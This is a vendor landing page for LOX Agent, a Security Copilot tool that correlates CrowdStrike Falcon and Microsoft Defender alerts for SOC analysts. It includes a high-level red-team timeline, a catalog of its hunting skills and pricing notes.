Lockbase Open XDR — Cross-EDR Investigation Coach for Microsoft Security Copilot
Investigate alerts in CrowdStrike Falcon and Microsoft Defender for Endpoint side by side, inside Security Copilot.
[ DESIGNED FOR ]
Designed for organizations running CrowdStrike Falcon as their primary active EDR alongside Microsoft Defender for Endpoint in passive mode. Defender contributes raw endpoint, identity, email, and cloud-app telemetry through Advanced Hunting while Falcon handles active prevention on the host.
> Three-paragraph technical brief. No marketing fluff. Read top to bottom — it walks the agent's job from input to output.
LOX Agent (Lockbase Open XDR) is a cross-EDR investigation coach designed for organizations running CrowdStrike Falcon as their primary active EDR alongside Microsoft Defender for Endpoint in passive mode, where Defender contributes raw endpoint, identity, email, and cloud-app telemetry through Advanced Hunting while Falcon handles active prevention on the host. LOX Agent unifies both inside Microsoft Security Copilot — treating Falcon's detections and Defender's raw telemetry as complementary signals on the same incident rather than parallel tools — and adds Microsoft Threat Intelligence enrichment plus a built-in library of KQL hunting skills to surface activity that neither product alerted on directly.
Analysts pose their question in plain language — a device name, user, IP, file hash, alert ID, or "what happened on this device today?" — and LOX Agent investigates by correlating CrowdStrike alerts with Defender telemetry for the same device or user, enriching every suspicious IP, domain, file hash, and CVE through Microsoft Threat Intelligence, and hunting for attacker techniques across endpoint, identity, email, and cloud activity. It flags CrowdStrike detections that fired but did not block the threat so unprevented attacks stand out, and reports when a Falcon sensor is in a degraded state so analysts know when an endpoint's prevention is reduced.
Each investigation returns a clear-priority summary (Critical, High, Medium, Low) with a plain-English narrative of what happened, a side-by-side view showing where Falcon's prevention layer and Defender's telemetry agree, disagree, or each surface evidence the other missed, concrete containment and remediation steps the analyst can act on immediately, and every finding labeled with its data source — coaching Level 1 and Level 2 analysts step by step from question to closed ticket.
Falcon detections and Defender telemetry on the same device, user, and incident — no more pivoting between consoles.
Every suspicious IP, domain, file hash, and CVE auto-enriched through MDTI and shown inline in the investigation.
Built-in hunts across endpoint, identity, email, and cloud activity — surface what neither product alerted on directly.
Falcon detections that fired but did not block are surfaced as P1-Critical so unprevented attacks stand out.
Reports when a Falcon sensor is in a degraded state (RFM) so analysts know when an endpoint's prevention is reduced.
Designed for L1 and L2 SOC analysts — every finding labeled with its data source, with concrete containment steps.
In a controlled red-team simulation, an adversary gained execution, dumped credentials, established persistence twice over, and quietly beaconed to attacker infrastructure. CrowdStrike raised 8 alerts, Defender raised 20 — and the C2 beacon appeared in neither product's alert queue. LOX Agent stitched all of it into one investigation.
| Time | Phase | Attacker action | CrowdStrike | Defender |
|---|---|---|---|---|
| T+0 | Initial Access / Execution | Remote script download and in-memory execution | ✓ Caught Detection-only alert | ✓ First Earliest signal |
| T+1m | Execution | Second-stage payload retrieved | ✓ Caught 2 alerts | — |
| T+2m | Defense Evasion | Code injected into a trusted system process | — | ✓ Caught |
| T+3m | Discovery | Host and domain reconnaissance burst | — | ✓ Caught Discovery cluster |
| T+5m | Persistence | Scheduled task installed to run as SYSTEM | — | ✓ Caught |
| T+6m | Persistence | Second persistence mechanism planted, disguised as a software updater | ✓ Caught 2 alerts | — |
| T+7m | Credential Access | Credentials dumped from memory | ✓ Caught Detection-only alert | — |
| T+10m | Command & Control | Implant begins low-and-slow beaconing to attacker infrastructure LOX Agent surfaced this from raw telemetry — no alert existed in either product. | — | — |
| T+15m | Exfiltration | Staged data exfiltrated to an anonymous file-sharing service | ✓ Caught Detection-only alert | ✓ Caught Suspicious transfer |
Timeline simplified from a controlled red-team exercise. CrowdStrike fired 8 detection-only alerts (none prevented); Defender fired 20.
A built-in library of investigation skills, categorized by attacker phase. Each category is a set of named capabilities the agent invokes inline — analysts never write the underlying queries by hand.
One pane across Defender XDR, MDE, MDI, MDO, MCAS, and CrowdStrike Falcon.
e.g.
Unified alert view
Every alert raised against a device or user — across both vendors — in a single answer, no console-hopping.
Process trees, IOC sweeps, masquerading, encoded PowerShell, and exploit chains.
e.g.
Obfuscated command analysis
Surfaces hidden and encoded attacker commands and decodes them inline during triage.
Sign-in risk, AiTM phishing, OAuth abuse, BEC, and mailbox tampering.
e.g.
Phish-to-compromise correlation
Connects a phishing email to the click, the sign-in that followed, and the endpoint it landed on.
LSASS, NTDS, SAM, and pass-the-hash.
e.g.
Credential-theft sweep
Flags credential dumping and domain-database access attempts across both EDRs in one pass.
Scheduled tasks, services, registry hooks, COM hijacks, and UAC bypass.
e.g.
Foothold discovery
Finds where an attacker has dug in for the long haul — and which footholds are quietly calling out.
SMB, DCOM, WinRM, NTLM relay, RMM tools, and AD reconnaissance.
e.g.
Blast-radius mapping
Shows where an intruder went next — and which other hosts show the same activity.
Beaconing, Cobalt Strike, DNS tunneling, and anti-forensics.
e.g.
Beacon hunting
Finds periodic outbound traffic patterns in raw telemetry — including activity neither EDR alerted on.
Cloud copy-out, archive staging, HTML smuggling, and ransomware indicators.
e.g.
Exfil staging detection
Spots data being archived, staged, and pushed to outside services — the quiet phase before the ransom note.
URLhaus, LOLDrivers, and LOLBAS feeds correlated with your telemetry.
e.g.
Fresh-intel sweep
Checks the day's threat feeds against your real telemetry — not just your alert queue.
ClickFix-style lures and modern social-engineering chains.
e.g.
Social-engineering chain tracing
Follows a lure from the user action that started it to everything it executed afterward.
Reputation, prevalence, vulnerability, and identity context for any indicator.
e.g.
One-question enrichment
Reputation, prevalence, and vulnerability context for any file, host, or user — without leaving the investigation.
We walk through the complete catalog — every skill, live, against real telemetry — in a demo.
Vector schematics that document how the agent actually moves data — system architecture and a worked cross-vendor use case. No hand-drawn boxes; every arrow is an actual API call. Click any diagram to open it at full resolution.
End-to-end view of how LOX Agent orchestrates CrowdStrike Falcon, Microsoft Defender XDR, and Microsoft Threat Intelligence inside a Security Copilot workspace.
Worked example showing LOX Agent stitching a Defender phishing alert to CrowdStrike endpoint telemetry and MDTI infrastructure context.
LOX Agent consumes approximately 0.3–1.5 SCU per triage run, depending on investigation depth.
Single-alert cross-EDR correlation
~0.3–0.5 SCU
Standard triage (3-5 indicator enrichments, 10-15 KQL hunts)
~0.6–1.0 SCU
Full investigation (20+ hunting skills)
~1.0–1.5 SCU
Extended hunts
+~0.2 SCU per additional 1 GB of Defender Advanced Hunting log data
SCU (Security Compute Units) are billed by Microsoft Security Copilot at the workspace level.
To deploy LOX Agent into your Microsoft Security Copilot workspace you'll need:
alerts:read and devices:read scopes Setup guide
Step-by-step deployment for Security Copilot and LOX Agent's integrations: CrowdStrike Falcon, Microsoft Defender for Endpoint, Microsoft Defender Threat Intelligence, Microsoft Security Copilot.
Contact us for early access →
Cross-EDR kill chain playbook
Six prompts that take an analyst from "something looks weird on a host" to a full incident report.
Request the playbook →
Microsoft Security Store listing
Listing pending Microsoft Partner Center review.
Coming soon
LockBase Cyber support
Implementation help, custom hunting skills, or detection engineering services.
Email the team →